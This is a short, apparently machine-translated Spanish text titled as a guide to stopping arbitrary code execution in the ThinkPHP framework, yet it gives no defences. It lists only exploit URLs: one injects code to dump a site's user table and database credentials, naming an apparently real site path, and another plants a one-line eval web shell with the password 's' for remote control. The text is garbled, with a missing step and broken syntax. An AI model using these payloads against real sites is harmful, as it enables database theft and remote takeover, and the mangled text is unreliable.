Cómo evitar que el marco thinkphp ejecute código arbitrario
1. Utilice la URL para ver la contraseña de la cuenta de base de datos del usuario DB_NAME, DB_PASS, DB_HOST
/eetodaycom/index.php/Product/show/id/25/parm1/${ @ var_dump(D(user)-gt; select())}
3. Ejecute directamente una oración de código y luego conéctese directamente con un cuchillo de cocina.
http:/ /site/index.php/module/action/param1/{${eval($_POST[s])}} Contraseña de una frase: s